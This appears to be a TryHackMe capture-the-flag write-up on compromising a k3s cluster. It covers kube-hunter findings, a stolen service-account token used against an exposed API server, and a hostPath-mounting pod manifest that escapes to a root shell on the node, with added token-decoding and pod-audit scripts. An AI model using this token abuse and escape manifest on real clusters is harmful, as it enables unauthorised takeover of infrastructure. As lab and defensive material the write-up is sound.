+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV052 | palsforlife:10250 | Information | Exposed Pods | An attacker could | count: 4 |
| | | Disclosure | | view sensitive | |
| | | | | information about | |
| | | | | pods that are | |
| | | | | bound to a Node | |
| | | | | using the /pods | |
| | | | | endpoint | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV046 | palsforlife:10250 | Information | Exposed Kubelet | Commandline flags | cmdline: /usr/local/ |
| | | Disclosure | Cmdline | that were passed to | bin/k3sserver--dis |
| | | | | the kubelet can be | able=traefik--disab |
| | | | | obtained from the | le=metrics- |
| | | | | pprof endpoints | server--kube- |
| | | | | | apiserver-arg=a... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV045 | palsforlife:10250 | Information | Exposed System Logs | System logs are | Could not parse |
| | | Disclosure | | exposed from the | system logs |
| | | | | /logs endpoint on | |
| | | | | the kubelet | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV038 | palsforlife:10250 | Information | Exposed Running Pods | Outputs a list of | 4 running pods |
| | | Disclosure | | currently running | |
| | | | | pods, | |
| | | | | and some of | |
| | | | | their metadata, | |
| | | | | which can reveal | |
| | | | | sensitive | |
| | | | | information | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | palsforlife:6443 | Information | Listing pods using | Accessing pods might | [{'name': b'local- |
| | | Disclosure | default service | give an attacker | path-provisioner-5ff |
| | | | account token | valuable information | 76fc89d-2llm9', |
| | | | | | 'namespace': b'kube- |
| | | | | | system'}, {'name': |
| | | | | | b'nginx... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | palsforlife:6443 | Information | Listing namespaces | Accessing namespaces | ['default', 'kube- |
| | | Disclosure | using default | might give an | system', 'kube- |
| | | | service account | attacker valuable | public', 'kube-node- |
| | | | token | information | lease'] |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | palsforlife:6443 | Information | Listing cluster | Accessing cluster | ['cloud-controller- |
| | | Disclosure | roles using default | roles might give an | manager', |
| | | | service account | attacker valuable | 'system:coredns', |
| | | | token | information | 'local-path- |
| | | | | | provisioner-role', ' |
| | | | | | system:k3s-controlle |
| | | | | | r... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV005 | palsforlife:6443 | Information | Access to API using | The API Server port | b'{"kind":"APIVersio |
| | | Disclosure | service account | is accessible. | ns","versions":["v1" |
| | | | token | Depending on | ],"serverAddressByCl |
| | | | | your RBAC settings | ientCIDRs":[{"client |
| | | | | this could expose | CIDR":"0.0.0.0/0","s |
| | | | | access to or control | ... |
| | | | | of your cluster. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV002 | palsforlife:6443 | Information | K8s Version | The kubernetes | v1.20.7+k3s1 |
| | | Disclosure | Disclosure | version could be | |
| | | | | obtained from the | |
| | | | | /version endpoint | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 9f68a Namespace: |
| | | | | attacker the option | kube-system Patch |
| | | | | to create new pods | evidence: kube- |
| | | | | with custom roles | system |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 91ad9 Namespace: |
| | | | | attacker the option | kube-node-lease |
| | | | | to create new pods | Patch evidence: |
| | | | | with custom roles | kube-node-lease |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 7a070 Namespace: |
| | | | | attacker the option | kube-public Patch |
| | | | | to create new pods | evidence: kube- |
| | | | | with custom roles | public |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched a role | Patching a role | Patched Role Name: |
| | | | | might give an | 4161b Namespace: |
| | | | | attacker the option | default Patch |
| | | | | to create new pods | evidence: default |
| | | | | with custom roles | |
| | | | | within the | |
| | | | | specific role's | |
| | | | | namespace scope | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: ec917 |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to compromise and | system Patch |
| | | | | control it | evidence: kube- |
| | | | | | system |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: bfff1 |
| | | | | allows an attacker | Namespace: default |
| | | | | to compromise and | Patch evidence: |
| | | | | control it | default |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: 5697a |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to compromise and | public Patch |
| | | | | control it | evidence: kube- |
| | | | | | public |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Patched A Pod | Patching a pod | Pod Name: 38c9e |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to compromise and | node-lease Patch |
| | | | | control it | evidence: kube-node- |
| | | | | | lease |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: f9a89 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:10:08Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: ec917 |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to disturb | system Delete time: |
| | | | | applications on the | 2021-09-25T08:10:03Z |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: d8cc1 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:09:55Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: bfff1 |
| | | | | allows an attacker | Namespace: default |
| | | | | to disturb | Delete time: |
| | | | | applications on the | 2021-09-25T08:09:57Z |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: b3333 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:10:14Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: 5697a |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to disturb | public Delete time: |
| | | | | applications on the | 2021-09-25T08:10:10Z |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: 38c9e |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to disturb | node-lease Delete |
| | | | | applications on the | time: |
| | | | | cluster | 2021-09-25T08:10:16Z |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Deleted A Pod | Deleting a pod | Pod Name: 359c0 |
| | | | | allows an attacker | Deletion time: |
| | | | | to disturb | 2021-09-25T08:10:01Z |
| | | | | applications on the | |
| | | | | cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Delete a namespace | Deleting a namespace | 2021-09-25T08:09:21Z |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to affect | |
| | | | | application behavior | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Delete a namespace | Deleting a namespace | 2021-09-25T08:09:20Z |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to affect | |
| | | | | application behavior | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 9f68a |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 91ad9 |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 7a070 |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a role | Creating a role | Role name: 4161b |
| | | | | might give an | |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | within the | |
| | | | | specified | |
| | | | | namespaces. | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a namespace | Creating a namespace | new namespace name: |
| | | | | might give an | a352e |
| | | | | attacker an area | |
| | | | | with default | |
| | | | | (exploitable) | |
| | | | | permissions to run | |
| | | | | pods in. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a namespace | Creating a namespace | new namespace name: |
| | | | | might give an | 4ddc7 |
| | | | | attacker an area | |
| | | | | with default | |
| | | | | (exploitable) | |
| | | | | permissions to run | |
| | | | | pods in. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a cluster | Creating a cluster | Cluster role name: |
| | | | role | role might give an | af55f |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | across the whole | |
| | | | | cluster | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created a cluster | Creating a cluster | Cluster role name: |
| | | | role | role might give an | 6dc02 |
| | | | | attacker the option | |
| | | | | to harm the normal | |
| | | | | behavior of newly | |
| | | | | created pods | |
| | | | | across the whole | |
| | | | | cluster | |
| | | | | | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: ec917 |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to run custom code | system |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: bfff1 |
| | | | | allows an attacker | Namespace: default |
| | | | | to run custom code | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: 5697a |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to run custom code | public |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A Pod | Creating a new pod | Pod Name: 38c9e |
| | | | | allows an attacker | Namespace: kube- |
| | | | | to run custom code | node-lease |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: f9a89 |
| | | | Pod | PRIVILEGED pod would | Namespace: kube- |
| | | | | gain an attacker | public |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: d8cc1 |
| | | | Pod | PRIVILEGED pod would | Namespace: default |
| | | | | gain an attacker | |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: b3333 |
| | | | Pod | PRIVILEGED pod would | Namespace: kube- |
| | | | | gain an attacker | node-lease |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| None | palsforlife:6443 | Access Risk | Created A PRIVILEGED | Creating a new | Pod Name: 359c0 |
| | | | Pod | PRIVILEGED pod would | Namespace: kube- |
| | | | | gain an attacker | system |
| | | | | FULL CONTROL over | |
| | | | | the cluster | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV050 | Local to Pod | Access Risk | Read access to pod's | Accessing the pod | eyJhbGciOiJSUzI1NiIs |
| | | | service account | service account | ImtpZCI6IkNtT1RDZkpC |
| | | | token | token gives an | dzVWVjR2eVE2OVl3TGly |
| | | | | attacker the option | a0tVZ21oY1NrTVBuUnUw |
| | | | | to use the server | b0JUU2sifQ.eyJpc3MiO |
| | | | | API | ... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+

The privileges attached to this token are very high: it can create pods and do much more, which makes us effectively a junior admin of this k3s cluster.

Following HackTricks, the next step would be to upload a kubectl binary into the pod to do more.

But because the API server (port 6443) is wrongly exposed outside the machine, we can also talk to it directly from our attack machine with the stolen token, no upload needed.
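Before spending a stolen service-account token against the API server, it is worth reading its claims to know which identity it represents (namespace and service-account name) and whether it ever expires. The kube-hunter row above shows the token is an ordinary JWT (the eyJhbGciOiJSUzI1NiIs... prefix is the base64url header of an RS256-signed token). The following script is an added example, not code from the writeup or from HackTricks; it decodes without verifying the signature (only the API server can verify it) and handles both the legacy secret-based token format and the newer bound-token format. The sample token it builds for offline use is constructed here, with made-up names, and is not the machine's token.

```python
import base64
import json
from typing import Dict, Optional, Tuple

# Added example (not from the writeup): inspect a Kubernetes service-account
# JWT without verifying it, to learn which identity it represents before use.


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64url padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def identity_from_claims(claims: dict) -> Tuple[Optional[str], Optional[str]]:
    """Return (namespace, service-account name) for legacy or bound tokens."""
    # Legacy secret-based tokens (what a 2021-era k3s mounts by default) use flat claims.
    ns = claims.get("kubernetes.io/serviceaccount/namespace")
    name = claims.get("kubernetes.io/serviceaccount/service-account.name")
    # Bound (projected) tokens nest the same data under "kubernetes.io".
    bound = claims.get("kubernetes.io")
    if isinstance(bound, dict):
        ns = ns or bound.get("namespace")
        name = name or (bound.get("serviceaccount") or {}).get("name")
    # Both formats also carry sub = system:serviceaccount:<ns>:<name>.
    sub = claims.get("sub", "")
    if (not ns or not name) and sub.startswith("system:serviceaccount:"):
        _, _, ns, name = sub.split(":", 3)
    return ns, name


def decode_sa_token(token: str) -> Dict[str, object]:
    """Parse header and claims of a service-account JWT.

    The signature is NOT checked: we only want to know what we hold.
    """
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT (expected header.payload.signature)")
    header = json.loads(b64url_decode(parts[0]))
    claims = json.loads(b64url_decode(parts[1]))
    ns, name = identity_from_claims(claims)
    return {
        "alg": header.get("alg"),
        "kid": header.get("kid"),
        "issuer": claims.get("iss"),
        "namespace": ns,
        "service_account": name,
        # Legacy tokens carry no "exp": a stolen one stays valid until the
        # secret is rotated or the service account is deleted.
        "expires": claims.get("exp"),
        "audience": claims.get("aud"),
    }


def make_sample_token() -> str:
    """Constructed legacy-style token for offline testing (fake signature)."""
    header = {"alg": "RS256", "kid": "sample-kid"}  # made-up key id
    claims = {
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": "default",
        "kubernetes.io/serviceaccount/secret.name": "default-token-sample",
        "kubernetes.io/serviceaccount/service-account.name": "default",
        "sub": "system:serviceaccount:default:default",
    }
    return ".".join([
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(claims, separators=(",", ":")).encode()),
        b64url_encode(b"not-a-real-signature"),
    ])


if __name__ == "__main__":
    import sys
    # Usage inside a pod:
    #   python3 sa_token.py < /var/run/secrets/kubernetes.io/serviceaccount/token
    raw = sys.stdin.read() if not sys.stdin.isatty() else make_sample_token()
    print(json.dumps(decode_sa_token(raw), indent=2))
```

Once you know the identity, ask the API server what it may do with `kubectl auth can-i --list --server=https://palsforlife:6443 --token='<token>' --insecure-skip-tls-verify=true`; that is the authoritative answer, and what kube-hunter's long "Access Risk" list above amounts to.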

More infos

Get pods:

kubectl get pods -o yaml > backup.config \
--server="https://palsforlife:6443" \
--token='<Token you steal>' \
--insecure-skip-tls-verify=true

Dumps the full spec of every pod as YAML into backup.config (namespace default unless -n is given; add -A to cover all namespaces).

kubectl get pods \
--server="https://palsforlife:6443" \
--token='<Token you steal>' \
--insecure-skip-tls-verify=true

Simple, nicely printed list of pods.

We can also enumerate more (configmaps, secrets, roles) following the HackTricks docs.

Escaping the K3s

The HackTricks doc shows a method to escape from the pod to the node.

The principle is the same as with Docker: create a pod that mounts the host's root filesystem (hostPath /) inside the container, here at /root, then chroot into that mount and run /bin/bash. The container process already runs as root, so a chroot into the host's filesystem is a root shell on the node.

Steps as here: https://book.hacktricks.xyz/pentesting/pentesting-kubernetes/enumeration-from-a-pod#escaping-from-the-pod

Problem: network

The TryHackMe network cannot reach the public Internet, so pulling an image from a registry would be blocked. We need to change the image and the imagePullPolicy in the evil YAML so that it reuses an image k3s already has cached locally (nginx here, with imagePullPolicy: IfNotPresent).

I copied the YAML from HackTricks and modified it as follows.

apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker
  name: attacker
  namespace: default
spec:
  volumes:
  - name: host-fs
    hostPath:
      path: /
  containers:
  - image: nginx
    imagePullPolicy: IfNotPresent
    name: attacker
    volumeMounts:
    - name: host-fs
      mountPath: /root
  restartPolicy: Never

Save it as evil.yaml, ready for use.

Deploy

Command to create the pod (kubectl apply builds nothing; the node just starts the cached nginx image with the host filesystem mounted):

kubectl apply -f ./evil.yaml \
--server="https://10.10.109.75:6443" \
--token='<token you steal>' \
--insecure-skip-tls-verify=true

Yep! The pod comes up and we can exec into it (wait until kubectl get pods shows it Running first):

kubectl exec -it attacker \
--server="https://10.10.109.75:6443" \
--token='<Token you steal>' \
--insecure-skip-tls-verify=true \
-- bash

ROOT!

Enjoy the root shell: chroot into the host filesystem mounted at /root and you are root on the node.

root@attacker:/# ls
bin dev docker-entrypoint.sh home lib64 mnt proc run srv tmp var
boot docker-entrypoint.d etc lib media opt root sbin sys usr
root@attacker:/# chroot /root /bin/bash
root@attacker:/# ls
bin etc initrd.img.old lost+found opt run srv tmp vmlinuz
boot home lib media proc sbin swapfile usr vmlinuz.old
dev initrd.img lib64 mnt root snap sys var
root@attacker:/# whoami
root
root@attacker:/# ls
bin etc initrd.img.old lost+found opt run srv tmp vmlinuz
boot home lib media proc sbin swapfile usr vmlinuz.old
dev initrd.img lib64 mnt root snap sys var
root@attacker:/# cd /root
root@attacker:~# ls
root.txt
root@attacker:~# cat root.txt # flag here
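
The escape above works because nothing on the cluster stops a pod from mounting hostPath / read-write (and kube-hunter's table shows privileged pods are allowed too). The following script is an added example, not part of the writeup or of HackTricks: it is the check a defender, or a pentester looking for an already-present escape, would run over `kubectl get pods -A -o json` to list pods that hand over the node in this way. The two sample pods embedded in it are constructed here (one mirrors the evil.yaml above, one is harmless); the list of sensitive host paths is my own choice, not a Kubernetes constant.

```python
import json
import posixpath
import sys
from typing import Dict, List

# Added example (not from the writeup): flag pods that expose the node through
# hostPath mounts, privileged containers or host namespaces.

# Host paths that hand over the node when mounted read-write (my selection).
SENSITIVE_PREFIXES = ("/etc", "/root", "/home", "/proc", "/sys", "/dev",
                      "/var/run", "/run", "/var/lib/rancher", "/var/lib/kubelet")


def is_sensitive_host_path(path: str) -> bool:
    norm = posixpath.normpath(path)
    return norm == "/" or any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_PREFIXES)


def audit_pod(pod: dict) -> List[Dict[str, str]]:
    """Return findings for one Pod object (shape of kubectl -o json output)."""
    meta, spec = pod.get("metadata", {}), pod.get("spec", {})
    ident = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
    findings: List[Dict[str, str]] = []

    def add(severity: str, container: str, reason: str) -> None:
        findings.append({"pod": ident, "severity": severity,
                         "container": container, "reason": reason})

    # Sharing a host namespace is an escape primitive on its own (e.g. hostPID + nsenter).
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            add("high", "-", f"spec.{flag}=true")

    host_paths = {v["name"]: v["hostPath"].get("path", "")
                  for v in spec.get("volumes", []) if "hostPath" in v}

    for c in spec.get("initContainers", []) + spec.get("containers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            add("critical", c["name"], "privileged container (full device/capability access)")
        if "SYS_ADMIN" in ((sc.get("capabilities") or {}).get("add") or []):
            add("high", c["name"], "adds CAP_SYS_ADMIN")
        for vm in c.get("volumeMounts", []):
            path = host_paths.get(vm["name"])
            if path is None:
                continue  # not a hostPath volume
            rw = not vm.get("readOnly", False)
            sev = "critical" if is_sensitive_host_path(path) and rw else "medium"
            add(sev, c["name"],
                f"hostPath {path} mounted at {vm['mountPath']} ({'rw' if rw else 'ro'})")
    return findings


def audit_pod_list(doc: dict) -> List[Dict[str, str]]:
    """Audit a List object, i.e. the output of `kubectl get pods -A -o json`."""
    return [f for item in doc.get("items", []) for f in audit_pod(item)]


# Constructed samples: the writeup's evil pod, and a harmless one.
EVIL_POD = {
    "metadata": {"name": "attacker", "namespace": "default"},
    "spec": {
        "volumes": [{"name": "host-fs", "hostPath": {"path": "/"}}],
        "containers": [{"name": "attacker", "image": "nginx",
                        "volumeMounts": [{"name": "host-fs", "mountPath": "/root"}]}],
    },
}
BENIGN_POD = {
    "metadata": {"name": "web", "namespace": "default"},
    "spec": {
        "volumes": [{"name": "cache", "emptyDir": {}}],
        "containers": [{"name": "web", "image": "nginx",
                        "securityContext": {"privileged": False},
                        "volumeMounts": [{"name": "cache", "mountPath": "/cache"}]}],
    },
}

if __name__ == "__main__":
    # Usage: kubectl get pods -A -o json | python3 audit_pods.py
    doc = json.load(sys.stdin) if not sys.stdin.isatty() else {"items": [EVIL_POD, BENIGN_POD]}
    for f in audit_pod_list(doc):
        print(f"[{f['severity']}] {f['pod']} {f['container']}: {f['reason']}")
```

On a cluster as old as this one (k3s v1.20) the admission-time guard rail was PodSecurityPolicy; on current clusters, labelling a namespace with `pod-security.kubernetes.io/enforce=baseline` makes the API server reject hostPath volumes and privileged containers outright, so the evil.yaml above would never be scheduled.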

flags

  • flag1: in the gitea container, /data/gitea/gitea.db
  • flag2: in the gitea container, /root/flag2.txt
  • flag3: in the kubectl configmaps; also available on the physical machine in store.db (flag2.txt can be found there too)
  • flag4: on the physical machine, /root/root.txt
  • (not a flag) the configmap also holds an HTML page containing a base64-encoded PDF. The PDF is encrypted: convert it with ctf-tool/pdf2john.py, crack the hash with john and rockyou, and read the message inside.